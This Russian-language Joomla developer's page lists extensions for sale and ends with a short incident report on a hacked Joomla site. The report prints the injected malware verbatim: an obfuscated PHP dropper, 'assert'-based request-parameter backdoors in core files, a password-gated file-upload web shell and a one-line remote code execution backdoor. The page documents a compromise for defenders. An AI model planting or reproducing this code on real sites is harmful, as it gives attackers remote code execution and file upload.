• Главная
  • Взлом сайта Joomla - добавление кода для загрузки файлов

Приветствую на сайте проекта radgura !  

По всем вопросам пишите: Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

  • экспорт в яндекс маркет YML формат


    Стоимость 1000

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать компонент 1000руб. RUB
  • мониторинг здоровья


    Стоимость 700

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать компонент 700руб. RUB
  • Модуль отзывов яндекс маркета, флампа


    Стоимость 500

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать модуль 500руб. RUB
  • таблица замены по тегу


    Стоимость 700

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать компонент 700руб. RUB
  • ЖКХ паспорт дома


    Стоимость 2500

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать компонент 2500руб. RUB
  • Акции К2 store


    Стоимость 1200

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать компонент 1200руб. RUB
  • K2 store купоны


    Стоимость 1500

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать компонент 1500руб. RUB
  • K2 store сопутствующий товар


    Стоимость 1000

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать компонент 1000руб. RUB
  • Водяной знак, торговая марка


    Стоимость 1500

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать компонент 1500руб. RUB
  • JShopping поиск товара по атрибутам


    Стоимость 1000

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать модуль 1000руб. RUB
  • Плагин оплаты K2 store Tinkoff


    Стоимость 700

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать плагин 700руб. RUB
  • Плагин Scroll to Top Mobile Detect


    Стоимость 500

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать плагин 500руб. RUB
  • Плагин оплаты K2 store RoboKassa


    Стоимость 500

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать плагин 500руб. RUB
  • Плагин оплаты K2 store Яндекс Кошелек


    Стоимость 500

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать плагин 500руб. RUB
  • Статистика К2 (Joomla 3x)


    Стоимость 1500

    @radgura.ru
    Адриена Лежена
    63089
    Новосибирск
    Адриена Лежена
    +7(983)
    3067856
    Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

    Взлом сайта Joomla - добавление кода для загрузки файлов

    Вы можете Заказать компонент 1500руб. RUB

Взлом сайта Joomla - добавление кода для загрузки файлов

Столкнулся с изменением файлов на сайтах CSM Joomla, данные вписываются в базовые компоненты и бибилиотеку, злоумышленник делает загрузку файлов. профиклактика - заблокировать изменение этих файлов.

В поиске изменений помог компонент проверки файлов.

Ниже приведен код этого взлома, текст размещен для ознакомления, а не как инструкция к действию = ) 

 

Измененные файлы:

/components/com_contact/helpers/route.php

$content = '<?php (';$content .= '$_=';$content .= '@$_G';$content .= 'ET[c]).@$_($_P';;$content .= 'OS';$content .= 'T["f5a3p5"])?>';$file = fopen("com_contact_info.php", "w");fwrite($file, $content) ;

/components/com_media/media.php

isset($_REQUEST['f5a3p5']) && array_map("ass\x65rt",(array)$_REQUEST['f5a3p5']);

/includes/defines.php

isset($_REQUEST['f5a3p5']) && array_map("ass\x65rt",(array)$_REQUEST['f5a3p5']);

 

Далее размещается файл для загрузки файлов, было 3 случая, каждый раз разные файлы но в папке /libraries

/libraries/joomla/http/wrapper/cgi-f7.php

<?php if(md5($_GET["ms-load"])=="5637a21308208bf4b96294544bf880a2"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data" method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}

Также в корне сайта создается файл com_contact_info.php:

<?php ($_=@$_GET[c]).@$_($_POST["yp5s2z"])?>